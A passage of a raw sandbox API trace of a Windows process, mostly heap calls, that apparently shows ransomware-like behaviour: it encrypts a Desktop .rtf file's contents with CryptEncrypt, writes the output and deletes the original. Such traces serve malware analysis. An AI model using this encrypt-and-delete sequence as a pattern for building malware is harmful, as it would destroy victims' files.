hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0103.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0103.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0103.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0103.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0103.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0103.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ad1510 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0103.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0103.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.048] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0103.048] CryptEncrypt (in: hKey=0x9a4440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xecc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xed0) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0103.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.049] CharLowerBuffW (in: lpsz="byte[3792]", cchLength=0xa | out: lpsz="byte[3792]") returned 0xa [0103.117] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.117] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.120] CryptEncrypt (in: hKey=0x9a4440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ad1510*, pdwDataLen=0x8cef60*=0xecc, dwBufLen=0xed0 | out: pbData=0x2ad1510*, pdwDataLen=0x8cef60*=0xed0) returned 1 [0103.123] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.123] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.123] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.123] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.123] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.123] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.123] WriteFile (in: hFile=0x44c, lpBuffer=0x2ace888*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ace888*, lpNumberOfBytesWritten=0x8cf5e4*=0xed0, lpOverlapped=0x0) returned 1 [0103.124] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0103.124] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0103.124] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.124] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9be0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0103.125] CryptDestroyKey (hKey=0x9a4440) returned 1 [0103.125] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.125] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.125] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.125] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.125] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.125] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.125] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.125] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.125] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.125] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.125] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.125] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.125] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.125] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.125] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.125] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0103.125] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0103.125] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.126] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.126] FreeLibrary (hLibModule=0x76390000) returned 1 [0103.126] CloseHandle (hObject=0x458) returned 1 [0103.126] CloseHandle (hObject=0x44c) returned 1 [0103.129] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.129] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.129] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/MdUrzCG7I8VQVwhMz8.rtf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\MdUrzCG7I8VQVwhMz8.rtf", lpFilePart=0x8cedf4*="MdUrzCG7I8VQVwhMz8.rtf") returned 0x2e [0103.130] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MdUrzCG7I8VQVwhMz8.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\mdurzcg7i8vqvwhmz8.rtf")) returned 0x20 [0103.130] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\MdUrzCG7I8VQVwhMz8.rtf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 0x9a3b80 [0103.130] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MdUrzCG7I8VQVwhMz8.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\mdurzcg7i8vqvwhmz8.rtf")) returned 1 [0103.175] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 0 [0103.175] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0103.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75fd8 | out: hHeap=0x2af0000) returned 1 [0103.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0103.176] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, 